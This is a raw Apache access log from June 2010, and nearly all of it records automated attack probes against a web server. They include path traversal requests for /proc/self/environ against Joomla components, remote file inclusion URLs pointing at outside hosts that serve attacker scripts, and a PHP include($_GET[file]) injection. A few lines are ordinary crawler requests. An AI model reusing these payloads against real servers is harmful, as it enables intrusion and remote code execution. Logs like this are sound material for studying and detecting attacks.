76.73.79.61 - - [07/Jun/2010:06:23:03 -0500] "GET /logs/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
76.73.79.61 - - [07/Jun/2010:06:23:03 -0500] "GET /logs/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
76.73.79.61 - - [07/Jun/2010:06:23:04 -0500] "GET /index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
76.73.79.61 - - [07/Jun/2010:06:23:04 -0500] "GET /index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.53.154.162 - - [07/Jun/2010:06:25:04 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.53.154.162 - - [07/Jun/2010:06:25:04 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.53.154.162 - - [07/Jun/2010:06:25:05 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
94.136.38.250 - - [07/Jun/2010:06:26:55 -0500] "GET /logs/access_log.1274832000//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.803"
94.136.38.250 - - [07/Jun/2010:06:26:56 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.136.38.250 - - [07/Jun/2010:06:26:56 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8571 "-""libwww-perl/5.803"
67.195.112.180 - - [07/Jun/2010:06:27:41 -0500] "GET /logs/access_log.1222732800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
59.42.10.71 - - [07/Jun/2010:06:28:14 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
59.42.10.71 - - [07/Jun/2010:06:28:14 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
59.42.10.71 - - [07/Jun/2010:06:28:14 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
59.42.10.71 - - [07/Jun/2010:06:28:19 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
59.42.10.71 - - [07/Jun/2010:06:28:19 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
221.141.3.43 - - [07/Jun/2010:06:28:40 -0500] "GET //galeria.php?start=0&kategoria=%0Did.jpg?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
221.141.3.43 - - [07/Jun/2010:06:28:41 -0500] "GET /logs//galeria.php?start=0&kategoria=%0Did.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
121.88.4.141 - - [07/Jun/2010:06:29:23 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.88.4.141 - - [07/Jun/2010:06:29:23 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
121.88.4.141 - - [07/Jun/2010:06:29:26 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.88.4.141 - - [07/Jun/2010:06:29:30 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
121.88.4.141 - - [07/Jun/2010:06:29:34 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.88.4.141 - - [07/Jun/2010:06:29:38 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
77.222.56.62 - - [07/Jun/2010:06:34:55 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUNhttp://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.222.56.62 - - [07/Jun/2010:06:34:56 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUNhttp://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
190.152.145.54 - - [07/Jun/2010:06:39:24 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:06:39:24 -0500] "GET /logs/access_log.1273363200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:06:39:24 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:06:39:32 -0500] "GET /logs/access_log.1274832000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
211.251.222.135 - - [07/Jun/2010:06:39:36 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.251.222.135 - - [07/Jun/2010:06:39:36 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.251.222.135 - - [07/Jun/2010:06:39:36 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.251.222.135 - - [07/Jun/2010:06:39:42 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.251.222.135 - - [07/Jun/2010:06:39:42 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.251.222.135 - - [07/Jun/2010:06:39:42 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
221.141.3.43 - - [07/Jun/2010:06:45:46 -0500] "GET //sitemap.php?mosConfig_admin_=%0Did.jpg?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
221.141.3.43 - - [07/Jun/2010:06:45:47 -0500] "GET /logs//sitemap.php?mosConfig_admin_=%0Did.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
221.141.3.43 - - [07/Jun/2010:06:46:59 -0500] "GET //linkpoint.inc.php?config[root_dir]=%20id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
221.141.3.43 - - [07/Jun/2010:06:47:01 -0500] "GET /logs//linkpoint.inc.php?config[root_dir]=%20id.jpg?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
77.222.56.62 - - [07/Jun/2010:06:49:10 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
77.222.56.62 - - [07/Jun/2010:06:49:11 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:06:50:17 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 362 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:06:50:22 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""libwww-perl/5.805"
221.141.3.43 - - [07/Jun/2010:06:52:33 -0500] "GET //modify.php?dir_module=%20%0Did.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
221.141.3.43 - - [07/Jun/2010:06:52:34 -0500] "GET /logs//modify.php?dir_module=%20%0Did.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
217.149.52.101 - - [07/Jun/2010:06:53:07 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
217.149.52.101 - - [07/Jun/2010:06:53:07 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
77.222.56.62 - - [07/Jun/2010:06:53:50 -0500] "GET //admin.php?include_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.222.56.62 - - [07/Jun/2010:06:53:51 -0500] "GET /logs//admin.php?include_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
221.141.3.43 - - [07/Jun/2010:06:55:36 -0500] "GET //db.php?commonpath=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
221.141.3.43 - - [07/Jun/2010:06:55:37 -0500] "GET /logs//db.php?commonpath=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
208.115.111.248 - - [07/Jun/2010:06:59:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
79.170.45.162 - - [07/Jun/2010:07:00:08 -0500] "GET /logs//microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-""libwww-perl/5.836"
79.170.45.162 - - [07/Jun/2010:07:00:08 -0500] "GET //microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-""libwww-perl/5.836"
122.252.7.141 - - [07/Jun/2010:07:01:29 -0500] "GET /logs//microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-""libwww-perl/5.831"
122.252.7.141 - - [07/Jun/2010:07:01:29 -0500] "GET //microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-""libwww-perl/5.831"
174.120.234.2 - - [07/Jun/2010:07:03:55 -0500] "HEAD /tattoo/tattoo1.htm HTTP/1.0" 200 0 "-""WordPress/2.9.2; http://LOWRIDER-DESIGN.COM"
221.141.3.43 - - [07/Jun/2010:07:08:25 -0500] "GET //wordtube-button.php?wpPATH=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
221.141.3.43 - - [07/Jun/2010:07:08:25 -0500] "GET /logs//wordtube-button.php?wpPATH=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
77.222.56.62 - - [07/Jun/2010:07:08:38 -0500] "GET //struct_admin.php?incl_page=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.222.56.62 - - [07/Jun/2010:07:08:38 -0500] "GET /logs//struct_admin.php?incl_page=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
77.222.56.62 - - [07/Jun/2010:07:10:32 -0500] "GET //struct_main.php?incl_page=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.222.56.62 - - [07/Jun/2010:07:10:33 -0500] "GET /logs//struct_main.php?incl_page=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
207.46.204.194 - - [07/Jun/2010:07:11:06 -0500] "GET /logs/access_log.1162857600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.222.56.62 - - [07/Jun/2010:07:11:43 -0500] "GET //struct_admin.php?incl_page=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.222.56.62 - - [07/Jun/2010:07:11:47 -0500] "GET /logs//struct_admin.php?incl_page=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
207.46.204.187 - - [07/Jun/2010:07:13:06 -0500] "GET /logs/access_log.1235520000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.179 - - [07/Jun/2010:07:13:27 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.77.90 - - [07/Jun/2010:07:18:09 -0500] "GET /logs/!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:07:18:09 -0500] "GET /!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.810"
64.15.156.75 - - [07/Jun/2010:07:18:19 -0500] "GET /logs/access_log.1205107200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/id.txt???? HTTP/1.1" 404 361 "-""libwww-perl/5.810"
64.15.156.75 - - [07/Jun/2010:07:18:19 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/id.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.810"
64.15.156.75 - - [07/Jun/2010:07:18:19 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/id.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
110.45.144.176 - - [07/Jun/2010:07:21:17 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/id.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
110.45.144.176 - - [07/Jun/2010:07:21:17 -0500] "GET /logs/access_log.1205107200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/id.txt???? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
110.45.144.176 - - [07/Jun/2010:07:21:17 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/id.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
207.46.199.46 - - [07/Jun/2010:07:23:36 -0500] "GET /logs/access_log.1158796800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.77.90 - - [07/Jun/2010:07:23:49 -0500] "GET /logs/!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:07:23:49 -0500] "GET /!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.810"
190.152.145.54 - - [07/Jun/2010:07:24:54 -0500] "GET /logs//index.php?option=com_lurm_constructor&mosConfig_absolute_path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:07:24:54 -0500] "GET /logs/access_log.1273363200%20%20//index.php?option=com_lurm_constructor&mosConfig_absolute_path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:07:24:54 -0500] "GET //index.php?option=com_lurm_constructor&mosConfig_absolute_path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:07:24:55 -0500] "GET /logs/access_log.1273363200%20%20//index.php?option=com_lurm_constructor&mosConfig_absolute_path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:07:24:55 -0500] "GET //index.php?option=com_lurm_constructor&mosConfig_absolute_path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:07:24:55 -0500] "GET /logs//index.php?option=com_lurm_constructor&mosConfig_absolute_path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
115.68.20.185 - - [07/Jun/2010:07:25:33 -0500] "GET /logs/access_log.1205107200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/yes.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
115.68.20.185 - - [07/Jun/2010:07:25:33 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/yes.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
115.68.20.185 - - [07/Jun/2010:07:25:34 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.biasy.net//modules/news_afp/yes.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
190.152.145.54 - - [07/Jun/2010:07:25:53 -0500] "GET /logs/access_log.1274832000%20%20//index.php?option=com_lurm_constructor&mosConfig_absolute_path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:07:25:53 -0500] "GET /logs/access_log.1274832000%20%20//index.php?option=com_lurm_constructor&mosConfig_absolute_path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
77.222.56.62 - - [07/Jun/2010:07:26:30 -0500] "GET //struct_main.php?incl_page=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.222.56.62 - - [07/Jun/2010:07:26:30 -0500] "GET /logs//struct_main.php?incl_page=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
190.152.145.54 - - [07/Jun/2010:07:26:38 -0500] "GET /logs/access_log.1271548800//index.php?option=com_lurm_constructor&mosConfig_absolute_path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:07:27:06 -0500] "GET /logs/access_log.1271548800//index.php?option=com_lurm_constructor&mosConfig_absolute_path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.108.177.125 - - [07/Jun/2010:07:27:43 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.108.177.125 - - [07/Jun/2010:07:27:43 -0500] "GET /logs/access_log.1271548800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
114.108.177.125 - - [07/Jun/2010:07:27:43 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
114.108.177.125 - - [07/Jun/2010:07:27:54 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.108.177.125 - - [07/Jun/2010:07:27:54 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
114.108.177.125 - - [07/Jun/2010:07:27:54 -0500] "GET /logs/access_log.1248652800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
114.108.177.125 - - [07/Jun/2010:07:28:28 -0500] "GET /logs/access_log.1271116800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:07:29:57 -0500] "GET /logs/access_log.1273363200//index.php?option=com_lurm_constructor&mosConfig_absolute_path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:07:30:01 -0500] "GET /logs/access_log.1274832000//index.php?option=com_lurm_constructor&mosConfig_absolute_path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:07:30:02 -0500] "GET /logs/access_log.1273363200//index.php?option=com_lurm_constructor&mosConfig_absolute_path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:07:30:07 -0500] "GET /logs/access_log.1274832000//index.php?option=com_lurm_constructor&mosConfig_absolute_path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.108.177.125 - - [07/Jun/2010:07:30:11 -0500] "GET /logs/access_log.1271548800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
221.141.3.43 - - [07/Jun/2010:07:30:46 -0500] "GET //dbutil.bck.php?confdir=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
221.141.3.43 - - [07/Jun/2010:07:30:49 -0500] "GET /logs//dbutil.bck.php?confdir=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
207.46.204.186 - - [07/Jun/2010:07:31:06 -0500] "GET /logs/access_log.1266537600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.174.28.46 - - [07/Jun/2010:07:31:58 -0500] "GET //linkadmin.php?page=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.174.28.46 - - [07/Jun/2010:07:31:58 -0500] "GET /logs//linkadmin.php?page=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
212.174.28.46 - - [07/Jun/2010:07:31:58 -0500] "GET /logs/access_log.1271462400//linkadmin.php?page=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
69.175.14.66 - - [07/Jun/2010:07:34:52 -0500] "GET //galeria.php?start=0&kategoria=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
69.175.14.66 - - [07/Jun/2010:07:34:52 -0500] "GET /logs/access_log.1271548800//galeria.php?start=0&kategoria=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.14.66 - - [07/Jun/2010:07:34:52 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
69.10.135.205 - - [07/Jun/2010:07:37:17 -0500] "GET /logs/access_log.1271548800//admin/auth.php?xcart_dir=http://juh.fileave.com/id2.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.10.135.205 - - [07/Jun/2010:07:37:17 -0500] "GET //admin/auth.php?xcart_dir=http://juh.fileave.com/id2.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.10.135.205 - - [07/Jun/2010:07:37:17 -0500] "GET /logs//admin/auth.php?xcart_dir=http://juh.fileave.com/id2.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
69.10.135.205 - - [07/Jun/2010:07:37:45 -0500] "GET /logs/access_log.1271721600//admin/auth.php?xcart_dir=http://juh.fileave.com/id2.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
92.48.207.112 - - [07/Jun/2010:07:39:44 -0500] "GET //components/com_flyspray/startdown.php?file=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.185.231.103 - - [07/Jun/2010:07:40:22 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
89.185.231.103 - - [07/Jun/2010:07:40:22 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.185.231.103 - - [07/Jun/2010:07:40:22 -0500] "GET /logs/access_log.1271548800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
91.121.164.97 - - [07/Jun/2010:07:41:25 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:07:41:25 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
207.46.199.198 - - [07/Jun/2010:07:42:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.222.56.62 - - [07/Jun/2010:07:42:28 -0500] "GET //write.php?dir=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.222.56.62 - - [07/Jun/2010:07:42:29 -0500] "GET /logs//write.php?dir=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
75.25.154.162 - - [07/Jun/2010:07:42:45 -0500] "GET /logs/access_log.1274832000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
75.25.154.162 - - [07/Jun/2010:07:42:45 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
75.25.154.162 - - [07/Jun/2010:07:42:45 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
